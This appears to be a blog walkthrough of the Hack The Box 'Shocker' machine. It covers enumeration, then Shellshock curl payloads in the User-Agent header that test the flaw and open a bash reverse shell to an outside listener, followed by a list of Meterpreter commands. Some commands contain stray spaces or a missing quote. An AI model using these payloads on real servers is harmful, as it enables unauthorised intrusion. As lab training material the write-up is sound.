Open in app

Sign in

Write

Sign in

Burak Dirlik
4 min read6 days ago

SHOCKER

Shocker machine is related to shellshock exploitation, target ip is 10.129.214.185 lets start.

nmap -sV -sC -Pn -p- nmapshocker.txt 10.129.214.185

When we go to the IP address via the browser, a funny picture appears.

Directory fuzzing

/cgi-bin/	-->	Forbidden 
/cgi-bin	-->	Not Found

Let’s dig a little deeper into the /cgi-bin/ directory

gobuster dir -u http:/10.129.214.185/cgi-bin/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -o gobuster.txt -x sh

We got /user.sh file at the sub directory. So time to apply shellshock.

Idea is change content of any header with

() { :; }; echo; /usr/bin/id

One liner curl command which verify this vuln.

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'id'" http://10.129.214.185/cgi-bin/user.sh

Curl:

curl -i -s -k -X 
$'GET' -H 
$'Host: 10.129.128.253' -H 
$'User-Agent:() { :; }; /bin/bash -i >& /dev/tcp/10 .10.14.168/8888 0>&1' -H 
$'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 
$'Accept-Lang uage: en-US,en;q=0.5' -H 
$'Accept-Encoding: gzip, deflate' -H 
$'Connection: close' -H 
$'Upgrade-Insecure-Requests: 1 
$'http://10.129.128.253/cgi-bin/user.sh'

Netcat:

nc -nlvp 8888

A simpler reverse shell with curl. Here we understand that there is no need to add every header. This is simpler version.

curl -A "() { :; }; /bin/bash -i >& /dev/tcp/10.10.14.168/8888 0>&1" http://10.129.128.253/cgi-bin/user.sh

Privilege escalation

Second way of getting shell with metasploit

One of the things we learned here is that meterpreter shell is not as interactive as normal shell. For example, it does not recognize commands such as id, sudo.

Switching meterpreter shell to interactive shell via shell command and we got root flag.

In Meterpreter, we can use various commands depending on the tasks you want to perform. Here are some commonly used commands in Meterpreter shells:

1. Core Commands:
            help: Lists all available Meterpreter commands or provides help for a specific command.
            background: Backgrounds the current session.
    2. System Commands:
            sysinfo: Displays information about the target system, such as os, architecture, etc.
            ps: Lists running processes on the target system.
            shell: Opens a command shell on the target system.
    3. File System Commands:
            ls: Lists files and directories on the target system.
            cd: Changes the current working directory.
            download: Downloads a file from the target system.
            upload: Uploads a file to the target system.
    4. Networking Commands:
            ipconfig: Displays network configuration information.
            portfwd: Forwards ports on the target system.
            route: Displays or modifies the target's routing table.
            pivot: Sets up pivoting through the compromised system.
    5. Privilege Escalation Commands:
            getsystem: Attempts to elevate privileges to SYSTEM.
            runas: Executes commands with a different user's privileges.
    6. Information Gathering Commands:
            getuid: Displays the current user's ID.
            getpid: Displays the current process ID.
    7. Post-Exploitation Commands:
            migrate: Moves the Meterpreter to another process.
            hashdump: Dumps password hashes from the target system.
    8. Scripting and Automation:
            resource: Executes Meterpreter commands from a script file.
            script: Loads Meterpreter scripts for automation.
Burak Dirlik

Written by Burak Dirlik

11 Followers

Computer Engineer & Penetration Tester

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams